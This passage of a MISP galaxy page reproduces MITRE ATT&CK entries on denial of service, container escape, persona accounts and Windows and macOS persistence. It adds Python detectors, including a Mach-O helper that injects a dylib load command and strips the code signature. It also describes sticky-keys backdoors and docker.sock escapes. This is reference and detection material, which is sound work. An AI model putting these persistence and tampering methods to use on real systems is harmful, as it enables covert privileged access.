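    return best


def _flood(events, key_index: int, window: timedelta, threshold: int) -> set[str]:
    buckets: dict[str, list[datetime]] = defaultdict(list)
    for ev in events:
        buckets[ev[key_index]].append(ev[0])
    return {key for key, ts in buckets.items() if max_in_window(ts, window) > threshold}


def per_source_flood(events, window=timedelta(seconds=10), threshold=30) -> set[str]:
    """Simple HTTP flood from one address: request rate per source IP."""
    return _flood(events, 1, window, threshold)


def per_endpoint_flood(events, window=timedelta(seconds=10), threshold=100) -> set[str]:
    """Application exhaustion from many sources: request rate per path,
    which still trips when each individual source looks harmless."""
    return _flood(events, 2, window, threshold)


if __name__ == "__main__":
    evs = parse_log(ACCESS_LOG)
    print("loud sources:", per_source_flood(evs))
    print("hammered endpoints:", per_endpoint_flood(evs))
```

The per-endpoint check is the one that matters for the distributed case the Endpoint Denial of Service entry describes, where each bot sends only a little traffic; it also tells you which feature to rate-limit or cache, which a per-IP block list cannot.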

Internal MISP references

UUID 03619027-8a54-4cb2-8f1d-38d476edbdd8 which can be used as unique global reference for Service Exhaustion Flood in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1499.002

Endpoint Denial of Service

Adversaries may perform Endpoint Denial of Service (DoS) attacks to degrade or block the availability of services to users. Endpoint DoS can be performed by exhausting the system resources those services are hosted on or exploiting the system to cause a persistent crash condition. Example services include websites, email services, DNS, and web-based applications. Adversaries have been observed conducting DoS attacks for political purposes[FireEye OpPoisonedHandover February 2016] and to support other malicious activities, including distraction[FSISAC FraudNetDoS September 2012], hacktivism, and extortion.[Symantec DDoS October 2014]

An Endpoint DoS denies the availability of a service without saturating the network used to provide access to the service. Adversaries can target various layers of the application stack that is hosted on the system used to provide the service. These layers include the Operating Systems (OS), server applications such as web servers, DNS servers, databases, and the (typically web-based) applications that sit on top of them. Attacking each layer requires different techniques that take advantage of bottlenecks that are unique to the respective components. A DoS attack may be generated by a single system or multiple systems spread across the internet, which is commonly referred to as a distributed DoS (DDoS).

To perform DoS attacks against endpoint resources, several aspects apply to multiple methods, including IP address spoofing and botnets.

Adversaries may use the original IP address of an attacking system, or spoof the source IP address to make the attack traffic more difficult to trace back to the attacking system or to enable reflection. This can increase the difficulty defenders have in defending against the attack by reducing or eliminating the effectiveness of filtering by the source address on network defense devices.

Botnets are commonly used to conduct DDoS attacks against networks and services. Large botnets can generate a significant amount of traffic from systems spread across the global internet. Adversaries may have the resources to build out and control their own botnet infrastructure or may rent time on an existing botnet to conduct an attack. In some of the worst cases for DDoS, so many systems are used to generate requests that each one only needs to send out a small amount of traffic to produce enough volume to exhaust the target's resources. In such circumstances, distinguishing DDoS traffic from legitimate clients becomes exceedingly difficult. Botnets have been used in some of the most high-profile DDoS attacks, such as the 2012 series of incidents that targeted major US banks.[USNYAG IranianBotnet March 2016]

In cases where traffic manipulation is used, there may be points in the global network (such as high traffic gateway routers) where packets can be altered and cause legitimate clients to execute code that directs network packets toward a target in high volume. This type of capability was previously used for the purposes of web censorship where client HTTP traffic was modified to include a reference to JavaScript that generated the DDoS code to overwhelm target web servers.[ArsTechnica Great Firewall of China]

For attacks attempting to saturate the providing network, see Network Denial of Service.

Internal MISP references

UUID 8b0caea0-602e-4117-8322-b125150f5c2a which can be used as unique global reference for Endpoint Denial of Service in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Azure AD', 'Containers', 'Google Workspace', 'IaaS', 'Linux', 'macOS', 'Office 365', 'SaaS', 'Windows']
source MITRE

Escape to Host

Adversaries may break out of a container to gain access to the underlying host. This can allow an adversary access to other containerized resources from the host level or to the host itself. In principle, containerized resources should provide a clear separation of application functionality and be isolated from the host environment.[Docker Overview]

There are multiple ways an adversary may escape to a host environment. Examples include creating a container configured to mount the host’s filesystem using the bind parameter, which allows the adversary to drop payloads and execute control utilities such as cron on the host; utilizing a privileged container to run commands or load a malicious kernel module on the underlying host; or abusing system calls such as unshare and keyctl to escalate privileges and steal secrets.[Docker Bind Mounts][Trend Micro Privileged Container][Intezer Doki July 20][Container Escape][Crowdstrike Kubernetes Container Escape][Keyctl-unmask]

Additionally, an adversary may be able to exploit a compromised container with a mounted container management socket, such as docker.sock, to break out of the container via a Container Administration Command.[Container Escape] Adversaries may also escape via Exploitation for Privilege Escalation, such as exploiting vulnerabilities in global symbolic links in order to access the root directory of a host machine.[Windows Server Containers Are Open]

Gaining access to the host may provide the adversary with the opportunity to achieve follow-on objectives, such as establishing persistence, moving laterally within the environment, or setting up a command and control channel on the host.
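As an added example (not from this entry, ATT&CK or any container project), the Python below audits a Kubernetes pod spec for the settings the paragraphs above describe as the easy escape paths: a bind/hostPath mount of the host filesystem, a privileged container (which can load kernel modules), a mounted container runtime socket such as docker.sock, and the host namespaces and capabilities that make the rest trivial. The two pod specs are constructed; the path and capability lists are the reviewer's own choice and are not exhaustive.

```python
from __future__ import annotations

# Mounting "/" is the bind-mount escape from the text; the sockets allow a
# Container Administration Command against the host. Lists are illustrative.
RUNTIME_SOCKETS = {"/var/run/docker.sock", "/run/containerd/containerd.sock", "/run/crio/crio.sock"}
HOST_ROOT_PATHS = {"/", "/proc", "/sys", "/etc", "/root", "/var/lib/kubelet"}
ESCAPE_CAPS = {"SYS_ADMIN", "SYS_MODULE", "SYS_PTRACE", "SYS_RAWIO"}


def audit_pod(pod: dict) -> list[str]:
    """Return one finding per setting that makes Escape to Host trivial."""
    findings: list[str] = []
    spec = pod.get("spec", {})
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if spec.get(flag):
            findings.append(f"pod: {flag} shares the host namespace")
    volumes = {v["name"]: v for v in spec.get("volumes", [])}
    for c in spec.get("containers", []):
        name = c.get("name", "?")
        sc = c.get("securityContext", {})
        if sc.get("privileged"):
            findings.append(f"{name}: privileged (can load kernel modules, reach host devices)")
        for cap in sorted(ESCAPE_CAPS & set(sc.get("capabilities", {}).get("add", []))):
            findings.append(f"{name}: adds capability {cap}")
        for mount in c.get("volumeMounts", []):
            host_path = volumes.get(mount["name"], {}).get("hostPath", {}).get("path")
            if host_path is None:
                continue                      # configMap, secret, emptyDir: not a host path
            if host_path in RUNTIME_SOCKETS:
                findings.append(f"{name}: mounts container runtime socket {host_path}")
            else:
                norm = host_path.rstrip("/") or "/"
                if norm in HOST_ROOT_PATHS:
                    rw = "" if mount.get("readOnly") else " read-write"
                    findings.append(f"{name}: hostPath {host_path} mounted{rw}")
    return findings


# Constructed pod specs (not from any real cluster).
RISKY_POD = {
    "metadata": {"name": "debug-helper"},
    "spec": {
        "hostPID": True,
        "volumes": [
            {"name": "hostfs", "hostPath": {"path": "/"}},
            {"name": "dockersock", "hostPath": {"path": "/var/run/docker.sock"}},
            {"name": "cfg", "configMap": {"name": "app-config"}},
        ],
        "containers": [
            {"name": "app", "image": "registry.example/app:1.0",
             "volumeMounts": [{"name": "cfg", "mountPath": "/etc/app", "readOnly": True}]},
            {"name": "debug", "image": "registry.example/tools:latest",
             "securityContext": {"privileged": True,
                                 "capabilities": {"add": ["SYS_ADMIN", "NET_BIND_SERVICE"]}},
             "volumeMounts": [
                 {"name": "hostfs", "mountPath": "/host"},
                 {"name": "dockersock", "mountPath": "/var/run/docker.sock"},
             ]},
        ],
    },
}
SAFE_POD = {
    "metadata": {"name": "app"},
    "spec": {
        "volumes": [{"name": "cfg", "configMap": {"name": "app-config"}}],
        "containers": [{"name": "app", "image": "registry.example/app:1.0",
                        "securityContext": {"allowPrivilegeEscalation": False,
                                            "capabilities": {"drop": ["ALL"]}},
                        "volumeMounts": [{"name": "cfg", "mountPath": "/etc/app", "readOnly": True}]}],
    },
}

if __name__ == "__main__":
    for finding in audit_pod(RISKY_POD):
        print("-", finding)
```

The same checks belong in an admission policy rather than an after-the-fact audit; the function shape here is what such a policy evaluates, with the pod spec as its input.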

Internal MISP references

UUID bebaf25b-9f50-4e3b-96cc-cc55c5765b61 which can be used as unique global reference for Escape to Host in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['Containers', 'Linux', 'Windows']
source MITRE

Cloud Accounts

Adversaries may create accounts with cloud providers that can be used during targeting. Adversaries can use cloud accounts to further their operations, including leveraging cloud storage services such as Dropbox, MEGA, Microsoft OneDrive, or AWS S3 buckets for Exfiltration to Cloud Storage or to Upload Tools. Cloud accounts can also be used in the acquisition of infrastructure, such as Virtual Private Servers or Serverless infrastructure. Establishing cloud accounts may allow adversaries to develop sophisticated capabilities without managing their own servers.[Awake Security C2 Cloud]

Creating Cloud Accounts may also require adversaries to establish Email Accounts to register with the cloud provider.

Internal MISP references

UUID 4c7e52b1-9881-4966-b9b5-d88c5e88d604 which can be used as unique global reference for Cloud Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.003

Email Accounts

Adversaries may create email accounts that can be used during targeting. Adversaries can use accounts created with email providers to further their operations, such as leveraging them to conduct Phishing for Information or Phishing.[Mandiant APT1] Adversaries may also take steps to cultivate a persona around the email account, such as through use of Social Media Accounts, to increase the chance of success of follow-on behaviors. Created email accounts can also be used in the acquisition of infrastructure (ex: Domains).[Mandiant APT1]

To decrease the chance of physically tying back operations to themselves, adversaries may make use of disposable email services.[Trend Micro R980 2016]

Internal MISP references

UUID 1ff8b8f4-fa76-4226-a28b-b0c25c78b2eb which can be used as unique global reference for Email Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.002

Social Media Accounts

Adversaries may create and cultivate social media accounts that can be used during targeting. Adversaries can create social media accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations.[NEWSCASTER2014][BlackHatRobinSage]

For operations incorporating social engineering, the utilization of a persona on social media may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single social media site or across multiple sites (ex: Facebook, LinkedIn, Twitter, etc.). Establishing a persona on social media may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.

Once a persona has been developed an adversary can use it to create connections to targets of interest. These connections may be direct or may include trying to connect through others.[NEWSCASTER2014][BlackHatRobinSage] These accounts may be leveraged during other phases of the adversary lifecycle, such as during Initial Access (ex: Spearphishing via Service).

Internal MISP references

UUID fe0bf22c-efb2-4bc6-96d8-e0e909502fd7 which can be used as unique global reference for Social Media Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1585.001

Establish Accounts

Adversaries may create and cultivate accounts with services that can be used during targeting. Adversaries can create accounts that can be used to build a persona to further operations. Persona development consists of the development of public information, presence, history and appropriate affiliations. This development could be applied to social media, website, or other publicly available information that could be referenced and scrutinized for legitimacy over the course of an operation using that persona or identity.[NEWSCASTER2014][BlackHatRobinSage]

For operations incorporating social engineering, the utilization of an online persona may be important. These personas may be fictitious or impersonate real people. The persona may exist on a single site or across multiple sites (ex: Facebook, LinkedIn, Twitter, Google, GitHub, Docker Hub, etc.). Establishing a persona may require development of additional documentation to make them seem real. This could include filling out profile information, developing social networks, or incorporating photos.[NEWSCASTER2014][BlackHatRobinSage]

Establishing accounts can also include the creation of accounts with email providers, which may be directly leveraged for Phishing for Information or Phishing.[Mandiant APT1]

Internal MISP references

UUID 9a2d6628-0dd7-4f25-a242-b752fcf47ff4 which can be used as unique global reference for Establish Accounts in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
platforms ['PRE']
source MITRE

Accessibility Features

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by accessibility features. Windows contains accessibility features that may be launched with a key combination before a user has logged in (ex: when the user is on the Windows logon screen). An adversary can modify the way these programs are launched to get a command prompt or backdoor without logging in to the system.

Two common accessibility programs are C:\Windows\System32\sethc.exe, launched when the shift key is pressed five times and C:\Windows\System32\utilman.exe, launched when the Windows + U key combination is pressed. The sethc.exe program is often referred to as "sticky keys", and has been used by adversaries for unauthenticated access through a remote desktop login screen. [FireEye Hikit Rootkit]

Depending on the version of Windows, an adversary may take advantage of these features in different ways. Common methods used by adversaries include replacing accessibility feature binaries or pointers/references to these binaries in the Registry. In newer versions of Windows, the replaced binary needs to be digitally signed for x64 systems, the binary must reside in %systemdir%\, and it must be protected by Windows File or Resource Protection (WFP/WRP). [DEFCON2016 Sticky Keys] The Image File Execution Options Injection debugger method was likely discovered as a potential workaround because it does not require the corresponding accessibility feature binary to be replaced.

For simple binary replacement on Windows XP and later as well as Windows Server 2003/R2 and later, for example, the program (e.g., C:\Windows\System32\utilman.exe) may be replaced with "cmd.exe" (or another program that provides backdoor access). Subsequently, pressing the appropriate key combination at the login screen while sitting at the keyboard or when connected over Remote Desktop Protocol will cause the replaced file to be executed with SYSTEM privileges. [Tilbury 2014]

Other accessibility features exist that may also be leveraged in a similar fashion: [DEFCON2016 Sticky Keys][Narrator Accessibility Abuse]

  • On-Screen Keyboard: C:\Windows\System32\osk.exe
  • Magnifier: C:\Windows\System32\Magnify.exe
  • Narrator: C:\Windows\System32\Narrator.exe
  • Display Switcher: C:\Windows\System32\DisplaySwitch.exe
  • App Switcher: C:\Windows\System32\AtBroker.exe
Internal MISP references

UUID 9ed0f5c3-49ff-4c43-bb77-c00e466ce3ba which can be used as unique global reference for Accessibility Features in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.008

AppCert DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppCert DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppCertDLLs Registry key under HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\Session Manager\ are loaded into every process that calls the ubiquitously used application programming interface (API) functions CreateProcess, CreateProcessAsUser, CreateProcessWithLoginW, CreateProcessWithTokenW, or WinExec. [Elastic Process Injection July 2017]

Similar to Process Injection, this value can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. Malicious AppCert DLLs may also provide persistence by continuously being triggered by API activity.

Internal MISP references

UUID 4216058d-0912-4ff3-a7fd-dd7a7b346c96 which can be used as unique global reference for AppCert DLLs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.009

AppInit DLLs

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes. Dynamic-link libraries (DLLs) that are specified in the AppInit_DLLs value in the Registry keys HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows or HKEY_LOCAL_MACHINE\Software\Wow6432Node\Microsoft\Windows NT\CurrentVersion\Windows are loaded by user32.dll into every process that loads user32.dll. In practice this is nearly every program, since user32.dll is a very common library. [Elastic Process Injection July 2017]

Similar to Process Injection, these values can be abused to obtain elevated privileges by causing a malicious DLL to be loaded and run in the context of separate processes on the computer. [AppInit Registry] Malicious AppInit DLLs may also provide persistence by continuously being triggered by API activity.

The AppInit DLL functionality is disabled in Windows 8 and later versions when secure boot is enabled. [AppInit Secure Boot]

Internal MISP references

UUID 36b58363-ca6a-4614-bf6f-bfaecafedb5f which can be used as unique global reference for AppInit DLLs in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.010

Application Shimming

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by application shims. The Microsoft Windows Application Compatibility Infrastructure/Framework (Application Shim) was created to allow for backward compatibility of software as the operating system codebase changes over time. For example, the application shimming feature allows developers to apply fixes to applications (without rewriting code) that were created for Windows XP so that it will work with Windows 10. [Elastic Process Injection July 2017]

Within the framework, shims are created to act as a buffer between the program (or more specifically, the Import Address Table) and the Windows OS. When a program is executed, the shim cache is referenced to determine if the program requires the use of the shim database (.sdb). If so, the shim database uses hooking to redirect the code as necessary in order to communicate with the OS.

A list of all shims currently installed by the default Windows installer (sdbinst.exe) is kept in:

  • %WINDIR%\AppPatch\sysmain.sdb and
  • hklm\software\microsoft\windows nt\currentversion\appcompatflags\installedsdb

Custom databases are stored in:

  • %WINDIR%\AppPatch\custom & %WINDIR%\AppPatch\AppPatch64\Custom and
  • hklm\software\microsoft\windows nt\currentversion\appcompatflags\custom

To keep shims secure, Windows designed them to run in user mode so they cannot modify the kernel, and you must have administrator privileges to install a shim. However, certain shims can be used to Bypass User Account Control (UAC and RedirectEXE), inject DLLs into processes (InjectDLL), disable Data Execution Prevention (DisableNX) and Structured Exception Handling (DisableSEH), and intercept memory addresses (GetProcAddress).

Utilizing these shims may allow an adversary to perform several malicious acts such as elevate privileges, install backdoors, disable defenses like Windows Defender, etc. [FireEye Application Shimming] Shims can also be abused to establish persistence by continuously being invoked by affected programs.

Internal MISP references

UUID efbbe9d1-274c-4383-9c6c-44bd4eca1829 which can be used as unique global reference for Application Shimming in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.011

Change Default File Association

Adversaries may establish persistence by executing malicious content triggered by a file type association. When a file is opened, the default program used to open the file (also called the file association or handler) is checked. File association selections are stored in the Windows Registry and can be edited by users, administrators, or programs that have Registry access or by administrators using the built-in assoc utility.[Microsoft Change Default Programs][Microsoft File Handlers][Microsoft Assoc Oct 2017] Applications can modify the file association for a given file extension to call an arbitrary program when a file with the given extension is opened.

System file associations are listed under HKEY_CLASSES_ROOT\.[extension], for example HKEY_CLASSES_ROOT\.txt. The entries point to a handler for that extension located at HKEY_CLASSES_ROOT\[handler]. The various commands are then listed as subkeys underneath the shell key at HKEY_CLASSES_ROOT\[handler]\shell\[action]\command. For example:

  • HKEY_CLASSES_ROOT\txtfile\shell\open\command
  • HKEY_CLASSES_ROOT\txtfile\shell\print\command
  • HKEY_CLASSES_ROOT\txtfile\shell\printto\command

The values of the keys listed are commands that are executed when the handler opens the file extension. Adversaries can modify these values to continually execute arbitrary commands.[TrendMicro TROJ-FAKEAV OCT 2012]

Internal MISP references

UUID 9cfbe3ba-957e-49fd-9494-9870e5d0ae16 which can be used as unique global reference for Change Default File Association in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.001

Component Object Model Hijacking

Adversaries may establish persistence by executing malicious content triggered by hijacked references to Component Object Model (COM) objects. COM is a system within Windows to enable interaction between software components through the operating system.[Microsoft Component Object Model] References to various COM objects are stored in the Registry.

Adversaries can use the COM system to insert malicious code that can be executed in place of legitimate software through hijacking the COM references and relationships as a means for persistence. Hijacking a COM object requires a change in the Registry to replace a reference to a legitimate system component which may cause that component to not work when executed. When that system component is executed through normal system operation the adversary's code will be executed instead.[GDATA COM Hijacking] An adversary is likely to hijack objects that are used frequently enough to maintain a consistent level of persistence, but are unlikely to break noticeable functionality within the system as to avoid system instability that could lead to detection.

Internal MISP references

UUID 3e1ef5ba-6426-4fe0-ad48-78557667d680 which can be used as unique global reference for Component Object Model Hijacking in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.015

Emond

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by the Event Monitor Daemon (emond). Emond is a Launch Daemon that accepts events from various services, runs them through a simple rules engine, and takes action. The emond binary at /sbin/emond will load any rules from the /etc/emond.d/rules/ directory and take action once an explicitly defined event takes place.

The rule files are in the plist format and define the name, event type, and action to take. Some examples of event types include system startup and user authentication. Examples of actions are to run a system command or send an email. The emond service will not launch if there is no file present in the QueueDirectories path /private/var/db/emondClients, specified in the Launch Daemon configuration file at /System/Library/LaunchDaemons/com.apple.emond.plist.[xorrior emond Jan 2018][magnusviri emond Apr 2016][sentinelone macos persist Jun 2019]

Adversaries may abuse this service by writing a rule to execute commands when a defined event occurs, such as system start up or user authentication.[xorrior emond Jan 2018][magnusviri emond Apr 2016][sentinelone macos persist Jun 2019] Adversaries may also be able to escalate privileges from administrator to root as the emond service is executed with root privileges by the Launch Daemon service.

Internal MISP references

UUID 7f9dbafd-4c7e-4bd9-8aff-c2a800743a07 which can be used as unique global reference for Emond in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.014

Image File Execution Options Injection

Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by Image File Execution Options (IFEO) debuggers. IFEOs enable a developer to attach a debugger to an application. When a process is created, a debugger present in an application’s IFEO will be prepended to the application’s name, effectively launching the new process under the debugger (e.g., C:\dbg\ntsd.exe -g notepad.exe). [Microsoft Dev Blog IFEO Mar 2010]

IFEOs can be set directly via the Registry or in Global Flags via the GFlags tool. [Microsoft GFlags Mar 2017] IFEOs are represented as Debugger values in the Registry under HKLM\SOFTWARE{\Wow6432Node}\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\<executable> where <executable> is the binary on which the debugger is attached. [Microsoft Dev Blog IFEO Mar 2010]

IFEOs can also enable an arbitrary monitor program to be launched when a specified program silently exits (i.e. is prematurely terminated by itself or a second, non kernel-mode process). [Microsoft Silent Process Exit NOV 2017] [Oddvar Moe IFEO APR 2018] Similar to debuggers, silent exit monitoring can be enabled through GFlags and/or by directly modifying IFEO and silent process exit Registry values in HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\SilentProcessExit\. [Microsoft Silent Process Exit NOV 2017] [Oddvar Moe IFEO APR 2018]

Similar to Accessibility Features, on Windows Vista and later as well as Windows Server 2008 and later, a Registry key may be modified that configures "cmd.exe," or another program that provides backdoor access, as a "debugger" for an accessibility program (ex: utilman.exe). After the Registry is modified, pressing the appropriate key combination at the login screen while at the keyboard or when connected with Remote Desktop Protocol will cause the "debugger" program to be executed with SYSTEM privileges. [Tilbury 2014]

Similar to Process Injection, these values may also be abused to obtain privilege escalation by causing a malicious executable to be loaded and run in the context of separate processes on the computer. [Elastic Process Injection July 2017] Installing IFEO mechanisms may also provide Persistence via continuous triggered invocation.

Malware may also use IFEO to Impair Defenses by registering invalid debuggers that redirect and effectively disable various system and security applications. [FSecure Hupigon] [Symantec Ushedix June 2008]

Internal MISP references

UUID 91d813d3-c17c-4c4c-b86e-0667f669a2f4 which can be used as unique global reference for Image File Execution Options Injection in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.012
Related clusters

To see the related clusters, click here.

Installer Packages

Adversaries may establish persistence and elevate privileges by using an installer to trigger the execution of malicious content. Installer packages are OS specific and contain the resources an operating system needs to install applications on a system. Installer packages can include scripts that run prior to installation as well as after installation is complete. Installer scripts may inherit elevated permissions when executed. Developers often use these scripts to prepare the environment for installation, check requirements, download dependencies, and remove files after installation.[Installer Package Scripting Rich Trouton]

Using legitimate applications, adversaries have distributed applications with modified installer scripts to execute malicious content. When a user installs the application, they may be required to grant administrative permissions to allow the installation. At the end of the installation process of the legitimate application, content such as macOS postinstall scripts can be executed with the inherited elevated permissions. Adversaries can use these scripts to execute a malicious executable or install other malicious components (such as a Launch Daemon) with the elevated permissions.[Application Bundle Manipulation Brandon Dalton][wardle evilquest parti]

Depending on the distribution, Linux versions of package installer scripts are sometimes called maintainer scripts or post installation scripts. These scripts can include preinst, postinst, prerm, postrm scripts and run as root when executed.

For Windows, the Microsoft Installer service uses .msi files to manage installing, updating, and uninstalling applications. Adversaries have leveraged Prebuild and Postbuild events to run commands before or after a build when installing .msi files.[Windows AppleJeus GReAT][Debian Manual Maintainer Scripts]

Internal MISP references

UUID 8b8c0f91-17fb-41fe-905c-9cbf45593877 which can be used as unique global reference for Installer Packages in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.016
Related clusters

To see the related clusters, click here.

LC_LOAD_DYLIB Addition

Adversaries may establish persistence by executing malicious content triggered by the execution of tainted binaries. Mach-O binaries have a series of headers that are used to perform certain operations when a binary is loaded. The LC_LOAD_DYLIB header in a Mach-O binary tells macOS and OS X which dynamic libraries (dylibs) to load during execution time. These can be added ad-hoc to the compiled binary as long as adjustments are made to the rest of the fields and dependencies.[Writing Bad Malware for OSX] There are tools available to perform these changes.

Adversaries may modify Mach-O binary headers to load and execute malicious dylibs every time the binary is executed. Although any changes will invalidate digital signatures on binaries because the binary is being modified, this can be remediated by simply removing the LC_CODE_SIGNATURE command from the binary so that the signature isn’t checked at load time.[Malware Persistence on OS X]
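As an added example (not part of the original technique description or of any tool it cites), the following Python builds a constructed, minimal 64-bit Mach-O header, appends an LC_LOAD_DYLIB load command while dropping LC_CODE_SIGNATURE, and then audits the result the way a triage script would: it lists linked dylibs, flags paths outside the system library directories, and reports a missing code signature. The header layout and load-command constants are from Apple's mach-o/loader.h; the trusted-prefix list and the sample dylib paths are assumptions for illustration.

```python
import struct

# Constants from Apple's <mach-o/loader.h>
MH_MAGIC_64 = 0xFEEDFACF
LC_LOAD_DYLIB = 0x0000000C
LC_LOAD_WEAK_DYLIB = 0x80000018
LC_CODE_SIGNATURE = 0x0000001D
# mach_header_64: magic, cputype, cpusubtype, filetype, ncmds, sizeofcmds, flags, reserved
HEADER_FMT = '<IiiIIIII'
HEADER_LEN = struct.calcsize(HEADER_FMT)   # 32 bytes
# Assumption for illustration: dylibs outside these prefixes deserve a closer look.
TRUSTED_PREFIXES = ('/usr/lib/', '/System/Library/')


def _dylib_cmd(cmd, path):
    """Encode a dylib_command: 24-byte fixed part + NUL-terminated path, padded to 8 bytes."""
    name = path.encode() + b'\x00'
    size = 24 + len(name)
    size += (-size) % 8
    # name offset 24, timestamp 0, current/compat version 1.0.0
    fixed = struct.pack('<IIIIII', cmd, size, 24, 0, 0x10000, 0x10000)
    return fixed + name.ljust(size - 24, b'\x00')


def build_macho(dylibs, signed=True):
    """Constructed minimal arm64 Mach-O: header plus load commands only (no segments or code)."""
    cmds = b''.join(_dylib_cmd(LC_LOAD_DYLIB, p) for p in dylibs)
    if signed:
        cmds += struct.pack('<IIII', LC_CODE_SIGNATURE, 16, 0, 0)   # linkedit_data_command
    ncmds = len(dylibs) + (1 if signed else 0)
    header = struct.pack(HEADER_FMT, MH_MAGIC_64, 0x0100000C, 0, 2, ncmds, len(cmds), 0, 0)
    return header + cmds


def load_commands(blob):
    """Walk the load-command table, returning (cmd, raw_bytes) pairs; rejects inconsistent sizes."""
    magic, _, _, _, ncmds, sizeofcmds, _, _ = struct.unpack_from(HEADER_FMT, blob, 0)
    if magic != MH_MAGIC_64:
        raise ValueError('not a little-endian 64-bit Mach-O (fat and 32-bit files are out of scope here)')
    off, out = HEADER_LEN, []
    for _ in range(ncmds):
        cmd, size = struct.unpack_from('<II', blob, off)
        if size < 8 or off + size > HEADER_LEN + sizeofcmds:
            raise ValueError('malformed load command')
        out.append((cmd, blob[off:off + size]))
        off += size
    return out


def audit(blob):
    """Linked dylibs, whether LC_CODE_SIGNATURE is present, and dylib paths outside trusted prefixes."""
    dylibs, signed = [], False
    for cmd, raw in load_commands(blob):
        if cmd in (LC_LOAD_DYLIB, LC_LOAD_WEAK_DYLIB):
            name_off = struct.unpack_from('<I', raw, 8)[0]
            dylibs.append(raw[name_off:].split(b'\x00', 1)[0].decode())
        elif cmd == LC_CODE_SIGNATURE:
            signed = True
    # @rpath/@executable_path entries are skipped; resolving them needs LC_RPATH and the bundle layout.
    untrusted = [d for d in dylibs if not d.startswith('@') and not d.startswith(TRUSTED_PREFIXES)]
    return {'dylibs': dylibs, 'code_signature': signed, 'untrusted_dylibs': untrusted}


def add_load_dylib(blob, path, drop_signature=False):
    """Append an LC_LOAD_DYLIB (optionally dropping LC_CODE_SIGNATURE) and fix ncmds/sizeofcmds.
    A real binary needs slack between the load commands and the first segment for this to fit;
    this synthetic blob has nothing after the load commands."""
    fields = list(struct.unpack_from(HEADER_FMT, blob, 0))
    tail = blob[HEADER_LEN + fields[5]:]
    cmds = [c for c in load_commands(blob) if not (drop_signature and c[0] == LC_CODE_SIGNATURE)]
    cmds.append((LC_LOAD_DYLIB, _dylib_cmd(LC_LOAD_DYLIB, path)))
    body = b''.join(raw for _, raw in cmds)
    fields[4], fields[5] = len(cmds), len(body)
    return struct.pack(HEADER_FMT, *fields) + body + tail


if __name__ == '__main__':
    clean = build_macho(['/usr/lib/libSystem.B.dylib'])
    tainted = add_load_dylib(clean, '/Users/Shared/.cache/inject.dylib', drop_signature=True)
    print(audit(clean))
    print(audit(tainted))
```

On a real host the same audit logic applies to the output of `otool -l` or to the raw file, with the extra step of handling fat (multi-architecture) files and confirming with `codesign -v` rather than only checking that the load command exists.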

Internal MISP references

UUID cd52d338-ba23-43c8-975d-4db29aa96598 which can be used as unique global reference for LC_LOAD_DYLIB Addition in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.006
Related clusters

To see the related clusters, click here.

Netsh Helper DLL

Adversaries may establish persistence by executing malicious content triggered by Netsh Helper DLLs. Netsh.exe (also referred to as Netshell) is a command-line scripting utility used to interact with the network configuration of a system. It contains functionality to add helper DLLs for extending functionality of the utility.[TechNet Netsh] The paths to registered netsh.exe helper DLLs are entered into the Windows Registry at HKLM\SOFTWARE\Microsoft\Netsh.

Adversaries can use netsh.exe helper DLLs to trigger execution of arbitrary code in a persistent manner. This execution would take place anytime netsh.exe is executed, which could happen automatically, with another persistence technique, or if other software (ex: VPN) is present on the system that executes netsh.exe as part of its normal functionality.[Github Netsh Helper CS Beacon][Demaske Netsh Persistence]

Internal MISP references

UUID b2cae050-4916-44c0-a6a3-3fa257145872 which can be used as unique global reference for Netsh Helper DLL in MISP communities and other software using the MISP galaxy

Associated metadata
Metadata key Value
source MITRE
technique_attack_id T1546.007
Related clusters

To see the related clusters, click here.

PowerShell Profile

Adversaries may gain persistence and elevate privileges by executing malicious content triggered by PowerShell profiles. A PowerShell profile (profile.ps1) is a script that runs when PowerShell starts and can be used as a logon script to customize user environments.

